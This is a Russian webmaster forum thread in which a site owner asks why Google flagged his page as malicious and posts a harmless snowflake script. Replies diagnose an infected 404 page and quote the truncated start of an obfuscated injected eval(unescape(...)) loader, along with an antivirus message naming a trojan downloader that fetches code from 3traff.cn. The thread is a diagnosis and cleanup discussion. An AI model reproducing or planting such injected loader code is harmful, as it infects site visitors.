Вирус на сайте или глюк диагностики безопасности?

Walk
На сайте с 31.07.2008
Offline
41
567

Страница:

http://www.lival-svet.ru/support/ посчиталась гуглем как "сайт www.lival-svet.ru/support в список подозрительных веб-сайтов"

Что можно увидеть посмотрев страницу через FF

Просматриваю код - ничего подозрительного не вижу (да и сайт на shtml вирус особо ничего не намудришь)

Из активного содержимого на странице коды счетчики, сапы, и скрипт снежинок, который так и не заработал, код привожу ниже.

Прошу помочь разобраться - действительно ли "вредное активное содержимое есть" либо это неприятный глюк.

// Установить число снежинок (более чем на 30 - 40 не рекомендуется)

var snowmax=35

// Установить цвет для снега. Добавляйте столько цветов, сколько нужно
var snowcolor=new Array("#aaaacc","#ddddFF","#ccccDD")

// Установить шрифты, которые создают снежинки. Добавляйте столько шрифтов, сколько нужно
var snowtype=new Array("Times")

// Установить символ, что создает снежинку (рекомендуется: *)
var snowletter="*"

// Установить скорость спуска (рекомендуемый диапазон значений от 0,3 до 2)
var sinkspeed=0.6

// Установить максимальный размер вашей снежинки
var snowmaxsize=22

// Установить минимальный размер вашей снежинки
var snowminsize=8

// Установить снег-зону
// 1 все стороны, 2 левая сторона, 3 центр, 4 правая сторона
var snowingzone=1

///////////////////////////////////////////////////////////////////////////
// Конфигурация заканчивается здесь
///////////////////////////////////////////////////////////////////////////
// made by- http://www.goldaccordion.com


// Не изменяйте эти строки ниже
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
var x_mv=new Array();
var crds=new Array();
var lftrght=new Array();
var browserinfos=navigator.userAgent
var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
var ns6=document.getElementById&&!document.all
var opera=browserinfos.match(/Opera/)
var browserok=ie5||ns6||opera

function randommaker(range) {
rand=Math.floor(range*Math.random())
return rand
}

function initsnow() {
if (ie5 || opera) {
marginbottom = document.body.clientHeight
marginright = document.body.clientWidth
}
else if (ns6) {
marginbottom = window.innerHeight
marginright = window.innerWidth
}
var snowsizerange=snowmaxsize-snowminsize
for (i=0;i<=snowmax;i++) {
crds = 0;
lftrght = Math.random()*15;
x_mv = 0.03 + Math.random()/10;
snow=document.getElementById("s"+i)
snow.style.fontFamily=snowtype[randommaker(snowtype.length)]
snow.size=randommaker(snowsizerange)+snowminsize
snow.style.fontSize=snow.size
snow.style.color=snowcolor[randommaker(snowcolor.length)]
snow.sink=sinkspeed*snow.size/5
if (snowingzone==1) {snow.posx=randommaker(marginright-snow.size)}
if (snowingzone==2) {snow.posx=randommaker(marginright/2-snow.size)}
if (snowingzone==3) {snow.posx=randommaker(marginright/2-snow.size)+marginright/4}
if (snowingzone==4) {snow.posx=randommaker(marginright/2-snow.size)+marginright/2}
snow.posy=randommaker(2*marginbottom-marginbottom-2*snow.size)
snow.style.left=snow.posx
snow.style.top=snow.posy
}
movesnow()
}

function movesnow() {
for (i=0;i<=snowmax;i++) {
crds += x_mv;
snow.posy+=snow.sink
snow.style.left=snow.posx+lftrght*Math.sin(crds);
snow.style.top=snow.posy

if (snow.posy>=marginbottom-2*snow.size || parseInt(snow.style.left)>(marginright-3*lftrght)){
if (snowingzone==1) {snow.posx=randommaker(marginright-snow.size)}
if (snowingzone==2) {snow.posx=randommaker(marginright/2-snow.size)}
if (snowingzone==3) {snow.posx=randommaker(marginright/2-snow.size)+marginright/4}
if (snowingzone==4) {snow.posx=randommaker(marginright/2-snow.size)+marginright/2}
snow.posy=0
}
}
var timer=setTimeout("movesnow()",50)
}

for (i=0;i<=snowmax;i++) {
document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
}
if (browserok) {
window.onload=initsnow
}
cyku
На сайте с 15.10.2008
Offline
54
#1

эт у тя в index.html(php) ? удали этот код вообще :)

Walk
На сайте с 31.07.2008
Offline
41
#2

index.shtml

а что в этом коде такого?

cymax
На сайте с 28.08.2007
Offline
16
#3

Walk, для начала прочитайте разъяснение гугла по поводу вашего сайта: 55 страниц из 532 пытаются грузить код с домена 3traff.cn без разрешения пользователя. Так что это не глюк.

На сайте заражена страница 404, смотрите в конце

</html><!-- [ db0fd90e5c0585643cbbadf2ffb4d9a0 ] -->
<script>eval(unescape('function%20mgmelT%28nDH%29%7Bfunction%20sSD%28 ...
While trying to retrieve the URL: http://www.lival-svet.ru/xcmbxzmncbmxzbc
The folowing error was encountered:
The requested object is INFECTED. The following viruses Trojan-Downloader.JS.Remora.dk were found
Generated Tue Jan 20 15:56:23 2009 by Антивирусная защита Касперского для Я.Онлайн
Walk
На сайте с 31.07.2008
Offline
41
#4

cymax

Спасибо.

страницу 404 поправил, теперь она чистая, меняю пароль на фтп, но люди так же посоветовали "сваливать скорее с РБК хостинга" (давно хотел но все лень было заняться).

Может быть еще какие-то действия посоветуете сделать?

[Удален]
#5

А чем РБК не устроил, хостинг?

Walk
На сайте с 31.07.2008
Offline
41
#6
dreamir:
А чем РБК не устроил, хостинг?

Не хочу даже об этом говорить.

P.S. по теме, параллельно с делами продолжаю рассуждения.

Да, вредоносный код на странице 404 был, но почему ФФ добавил в "вирусы" страницу http://www.lival-svet.ru/support/ ?

Если смотреть ее код в браузере - там все чисто. Или есть какие то еще способы подгрузки вредоносного кода?

cymax
На сайте с 28.08.2007
Offline
16
#7
Walk:
Если смотреть ее код в браузере - там все чисто

Это сейчас там все чисто. А вчера было

<body>

<script src="js/script.js"></script>

Ссылка на скрипт "битая", поэтому робот гугла попадал на 404.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий